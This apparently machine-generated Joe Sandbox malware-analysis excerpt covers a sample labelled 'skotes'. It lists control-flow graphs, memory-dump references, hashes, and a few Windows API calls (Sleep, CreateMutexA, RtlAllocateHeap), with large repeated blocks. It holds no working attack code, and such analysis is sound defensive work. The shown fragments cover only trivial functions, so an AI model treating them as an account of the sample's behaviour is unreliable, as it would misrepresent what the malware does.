                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 86a2dbd1c0dc68550d804ef629da25535dcc726a67be5a1866229489d4a7e77b
                                                                                                                                            • Instruction ID: 8217d0f217dd1d294d8e77be65a000f8e37287b0333181440ac109b6f98c2df2
                                                                                                                                            • Opcode Fuzzy Hash: 86a2dbd1c0dc68550d804ef629da25535dcc726a67be5a1866229489d4a7e77b
                                                                                                                                            • Instruction Fuzzy Hash: 372149317042049BEB18AB68ED89F7DF7A2EBD1714F20425DE419D73E1CB759E818611

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 306 aca856-aca86e 307 aca89c-aca89e 306->307 308 aca870-aca87c 306->308 311 aca8a9-aca8b1 call ac7d30 307->311 312 aca8a0-aca8a7 307->312 309 aca87e-aca88c 308->309 310 aca892-aca899 call add663 308->310 309->310 313 aca94e-aca987 call af6c6a Sleep CreateMutexA 309->313 310->307 323 aca8e4-aca8e6 311->323 324 aca8b3-aca8bb call ac7d30 311->324 315 aca8eb-aca916 call ad80c0 312->315 326 aca98e-aca994 313->326 323->315 324->323 330 aca8bd-aca8c5 call ac7d30 324->330 328 aca996-aca998 326->328 329 aca9a7-aca9a8 326->329 328->329 331 aca99a-aca9a5 328->331 330->323 334 aca8c7-aca8cf call ac7d30 330->334 331->329 334->323 338 aca8d1-aca8d9 call ac7d30 334->338 338->323 341 aca8db-aca8e2 338->341 341->315
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: d2446f1b838021b56ac8cb52d6cd4c489d50e1adbe7bc5eb64cac440d52bd18d
                                                                                                                                            • Instruction ID: 14f88430590b6395dd49284f4f6b9abe3c22c5c5c8734d7e642b1f8582af86a1
                                                                                                                                            • Opcode Fuzzy Hash: d2446f1b838021b56ac8cb52d6cd4c489d50e1adbe7bc5eb64cac440d52bd18d
                                                                                                                                            • Instruction Fuzzy Hash: 04216D313452088BE72867AC9986F3DB2A1DF91708F21485EE509D62D1CF7A49818653

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 283 aca34f-aca35b 284 aca35d-aca36b 283->284 285 aca371-aca39a call add663 283->285 284->285 286 aca93a 284->286 291 aca39c-aca3a8 285->291 292 aca3c8-aca916 call ad80c0 285->292 288 aca953-aca994 Sleep CreateMutexA 286->288 289 aca93a call af6c6a 286->289 299 aca996-aca998 288->299 300 aca9a7-aca9a8 288->300 289->288 293 aca3be-aca3c5 call add663 291->293 294 aca3aa-aca3b8 291->294 293->292 294->286 294->293 299->300 302 aca99a-aca9a5 299->302 302->300
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: d9db76121d79adef83118bf8f9141f6afa25e460b39f2afd94c290489d379d29
                                                                                                                                            • Instruction ID: 7b46bd71973afea8105aa3bc760bda5338cf4a5a68acd91e9f85845e6fd66ad8
                                                                                                                                            • Opcode Fuzzy Hash: d9db76121d79adef83118bf8f9141f6afa25e460b39f2afd94c290489d379d29
                                                                                                                                            • Instruction Fuzzy Hash: D1217C317002089BEB189B68DD85F7DF7B1EBE1718F20425DE815DB3D0C7759A818752

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 342 afd82f-afd83a 343 afd83c-afd846 342->343 344 afd848-afd84e 342->344 343->344 345 afd87c-afd887 call af75f6 343->345 346 afd867-afd878 RtlAllocateHeap 344->346 347 afd850-afd851 344->347 351 afd889-afd88b 345->351 349 afd87a 346->349 350 afd853-afd85a call af9dc0 346->350 347->346 349->351 350->345 355 afd85c-afd865 call af8e36 350->355 355->345 355->346
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00AFA813,00000001,00000364,00000006,000000FF,?,00AFEE3F,?,00000004,00000000,?,?), ref: 00AFD871
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724337006.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724352685.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724367357.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724385048.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724401972.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724417017.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724437449.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724453437.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724470582.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724485673.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724502899.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724522536.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724542261.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724557646.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724570203.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724582604.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724596300.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724609519.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724625914.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724638543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724655369.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724670325.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724683020.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724696048.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724710174.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724723949.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724742408.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724755205.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724768317.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724780728.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724817804.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724831456.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724843697.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724856756.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724872262.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724886778.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724899881.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 670c276aab3e43869c1ee17d379234625710b3a898e05af781c4fd879763f2a5
                                                                                                                                            • Instruction ID: 6e1bedadf677ff47b923090a9233ff6894ebc47a595bd7f8ef558c8fac4987a8
                                                                                                                                            • Opcode Fuzzy Hash: 670c276aab3e43869c1ee17d379234625710b3a898e05af781c4fd879763f2a5
                                                                                                                                            • Instruction Fuzzy Hash: 01F05E3260522DA6EB226BF69D01A7B7B5ADB857F1F198521BF08A7181DB20DC0186E0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1724002601.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724017680.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724071809.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724088724.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724108920.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724124170.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724140511.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724253828.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724278346.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
